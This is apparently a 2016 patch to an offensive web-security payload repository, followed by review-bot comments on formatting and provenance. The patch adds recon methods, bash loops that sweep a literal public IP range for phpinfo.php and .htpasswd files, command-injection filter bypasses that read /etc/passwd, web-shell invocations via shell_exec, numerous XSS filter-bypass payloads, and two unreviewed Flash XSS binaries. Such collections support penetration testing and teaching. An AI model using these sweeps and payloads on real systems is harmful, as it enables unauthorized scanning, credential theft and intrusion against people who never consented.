From 14a82a14a41944c40007de497fed152e22121701 Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Tue, 20 Dec 2016 19:46:06 +0100 Subject: [PATCH] Methodo, SQL,RCE,XSS,XXE updated --- Methodology_and_enumeration.md | 70 +++++++++++-------- Remote commands execution/README.md | 5 ++ SQL injection/README.md | 2 +- Upload insecure files/Insecure Flash/xss.swf | Bin 0 -> 4852 bytes Upload insecure files/README.md | 3 - XSS injection/README.md | 29 +++++++- XSS injection/files/InsecureFlashFile.swf | Bin 0 -> 4852 bytes XXE injections/README.md | 3 +- 8 files changed, 77 insertions(+), 35 deletions(-) create mode 100644 Upload insecure files/Insecure Flash/xss.swf create mode 100644 XSS injection/files/InsecureFlashFile.swf diff --git a/Methodology_and_enumeration.md b/Methodology_and_enumeration.md index c5cf991..1d67f02 100644 --- a/Methodology_and_enumeration.md +++ b/Methodology_and_enumeration.md @@ -3,6 +3,12 @@ ## Bug Hunting Methodology * Enumerate all subdomains (only if the scope is *.domain.ext) +Using Subbrute +``` +python subbrute.py domain.example.com +``` + + Using KnockPy with Daniel Miessler’s SecLists for subdomain "/Discover/DNS" ``` git clone https://github.com/guelfoweb/knock @@ -11,6 +17,13 @@ git clone https://github.com/danielmiessler/SecLists.git knockpy domain.com -w /PATH_TO_SECLISTS/Discover/DNS/subdomains-top1mil-110000.txt ``` +Using Google Dorks +``` +site:*.domain.com -www +site:http://domain.com ext:php +site:http://domain.com filetype:pdf +``` + Using Jason Haddix's enumall Recon-ng script, ``` git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git @@ -58,7 +71,9 @@ sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv • -T4 defines the timing for the task (options are 0-5 and higher is faster) ``` -* List all the subdirectories with DirBuster or GoBuster +* List all the subdirectories and files + +Using DirBuster or GoBuster ``` ./gobuster -u http://buffered.io/ -w words.txt -t 10 -u url 
@@ -67,15 +82,40 @@ sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv More subdomain : ./gobuster -m dns -w subdomains.txt -u google.com -i + +gobuster -w wordlist -u URL -r -e ``` -* Explore the website +Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois) +``` +#!/bin/bash +for ipa in 98.13{6..9}.{0..255}.{0..255}; do +wget -t 1 -T 3 http://${ipa}/phpinfo.php; done & +``` + +Using a script to detect all .htpasswd files in a range of IPs +``` +#!/bin/bash +for ipa in 98.13{6..9}.{0..255}.{0..255}; do +wget -t 1 -T 3 http://${ipa}/.htpasswd; done & +``` + +* Explore the website with a proxy (ZAP/Burp Suite) ``` - Start ZAP proxy, visit the main target site and perform a Forced Browse to discover files and directories - Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy - Explore and understand available functionality, noting areas that correspond to vulnerability types ``` +* Look for Web Vulns +``` +- SQLi +- XSS +- RCE +- LFI/RFI +etc +``` + * Look for private information in GitHub repos with GitRob ``` git clone https://github.com/michenriksen/gitrob.git @@ -86,31 +126,5 @@ gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github. * Launch a Nikto scan in case you missed something - -## Google Dorks - -Google Dork to find subdomains -``` -site:*.domain.com -www -site:http://domain.com ext:php -site:http://domain.com filetype:pdf -``` - -## Scripts -Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois) -``` -#!/bin/bash -for ipa in 98.13{6..9}.{0..255}.{0..255}; do -wget -t 1 -T 3 http://${ipa}/phpinfo.php; done & -``` - -Script to detect all .htpasswd files in a range of IPs -``` -#!/bin/bash -for ipa in 98.13{6..9}.{0..255}.{0..255}; do -wget -t 1 -T 3 http://${ipa}/.htpasswd; done & -``` - - ## Thanks to * http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/ \ No newline at end of file 
diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 0603090..a9b66e0 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md 
@@ -33,6 +33,11 @@ swissky@crashlab▸ ~ ▸ $ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd RCE root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin + +swissky@crashlab▸ ~ ▸ $ X=$'uname\x20-a'&&$X +Linux crashlab 4.4.X-XX-generic #72-Ubuntu + +swissky@crashlab▸ ~ ▸ $ sh
diff --git a/Upload insecure files/README.md b/Upload insecure files/README.md index 798f239..83dbb45 100644 --- a/Upload insecure files/README.md +++ b/Upload insecure files/README.md @@ -9,7 +9,6 @@ Reverse Shell Touch command ``` - PHP Extension ``` .php @@ -25,7 +24,6 @@ Double extension .png.php ``` - PNG Bypass a resize - Upload the picture and use a local file inclusion ``` You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute. @@ -33,7 +31,6 @@ curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'" curl 'http://localhost/test.php?0=system' --data "1='ls'" ``` - JPG Bypass a resize - Upload the picture and use a local file inclusion ``` http://localhost/test.php?c=ls diff --git a/XSS injection/README.md b/XSS injection/README.md index c391143..6a0dcd9 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -163,6 +163,13 @@ XSS in SWF Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); + + +InsecureFlashFile.swf +location to url: InsecureFlashFile.swf?a=location&c=http://www.google.com/ +open url to new window: InsecureFlashFile.swf?a=open&c=http://www.google.com/ +http request to url: InsecureFlashFile.swf?a=get&c=http://www.google.com/ +eval js codz: InsecureFlashFile.swf?a=eval&c=alert(document.domain) ``` more payloads in ./files @@ -260,7 +267,6 @@ Bypass parenthesis for string - Firefox alert`1` ``` - Bypass onxxxx= blacklist ``` @@ -288,7 +294,7 @@ Bypass with incomplete html tag - IE/Firefox/Chrome/Safari window['alert'](0) 
@@ -296,6 +302,25 @@ Bypass using an alternate way to execute js ``` +Bypass ';' using another character +``` +'te' * alert('*') * 'xt'; +'te' / alert('/') / 'xt'; +'te' % alert('%') % 'xt'; +'te' - alert('-') - 'xt'; +'te' + alert('+') + 'xt'; +'te' ^ alert('^') ^ 'xt'; +'te' > alert('>') > 'xt'; +'te' < alert('<') < 'xt'; +'te' == alert('==') == 'xt'; +'te' & alert('&') & 'xt'; +'te' , alert(',') , 'xt'; +'te' | alert('|') | 'xt'; +'te' ? alert('ifelsesh') : 'xt'; +'te' in alert('in') in 'xt'; +'te' instanceof alert('instanceof') instanceof 'xt'; +``` + Bypass using Unicode ``` Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was 
diff --git a/XSS injection/files/InsecureFlashFile.swf b/XSS injection/files/InsecureFlashFile.swf new file mode 100644 index 0000000000000000000000000000000000000000..da8598b8fb015feffb54090af36a0b515d4d8084 GIT binary patch literal 4852
diff --git a/XXE injections/README.md b/XXE injections/README.md index 186126d..325990b 100644 --- a/XXE injections/README.md +++ b/XXE injections/README.md @@ -82,4 +82,5 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd ## Thanks to -* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing \ No newline at end of file +* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing +* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html \ No newline at end of file
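Review bot: The Subbrute entry added under "Enumerate all subdomains" in Methodology_and_enumeration.md (hunk @@ -3,6 +3,12) gives only the run command, while the KnockPy and recon-ng entries next to it begin with a git clone line. Add the tool's source so the entries are consistent. The target placeholder also differs: this entry uses domain.example.com and the KnockPy line uses domain.com, so pick one placeholder for the whole list.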
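Review bot: The two sweep scripts moved into the "List all the subdirectories and files" step of Methodology_and_enumeration.md (hunk @@ -67,15 +82,40) keep the literal range 98.13{6..9}.{0..255}.{0..255} and carry no scope condition, unlike the subdomain step, which is qualified with "only if the scope is *.domain.ext". Replace the literal range with a placeholder and add the same kind of in-scope qualifier. The added line gobuster -w wordlist -u URL -r -e also has no explanation of -r and -e, while the nmap block earlier in the file documents each of its flags.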
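Review bot: The commands added at the end of hunk @@ -33,6 +33,11 in Remote commands execution/README.md have no caption, so the reader has to infer how X=$'uname\x20-a'&&$X relates to the ${IFS} example above it. Add a one-line label for each variant, and state which shell the examples were run in, since the $'...' quoting is not supported by every /bin/sh.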
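Review bot: Two compiled Flash files are added as opaque binaries (Upload insecure files/Insecure Flash/xss.swf and XSS injection/files/InsecureFlashFile.swf, both 4852 bytes in the diffstat) with no source or provenance, so their behaviour cannot be reviewed from the patch. Commit the ActionScript source or state the origin next to each file, and if the two are the same file, keep one copy and link to it from the other README.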
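Review bot: The InsecureFlashFile.swf entries added in hunk @@ -163,6 +163,13 of XSS injection/README.md refer to the file by bare name although the patch stores it under XSS injection/files/, and the a and c parameters are shown without a sentence on what the file does with them. Give the relative path, describe the two parameters, and fix the label "eval js codz".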
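Review bot: The "Bypass ';' using another character" list added in hunk @@ -296,6 +302,25 of XSS injection/README.md has no browser annotation, unlike neighbouring headings such as "Bypass parenthesis for string - Firefox", and it does not say that the last two entries behave differently from the rest. With in and instanceof the right-hand operand is the return value of alert(), which is undefined, so the expression raises a TypeError once the call returns. Add the browsers these were tested in and a comment on those two lines. The label 'ifelsesh' in the ternary entry also looks like a typo.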
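Review bot: XXE injections/README.md still ends without a newline after the added link (hunk @@ -82,4 +82,5, marked "\ No newline at end of file"), and Methodology_and_enumeration.md carries the same marker. End both files with a newline so the next append to the "Thanks to" list does not show the previous last line as modified.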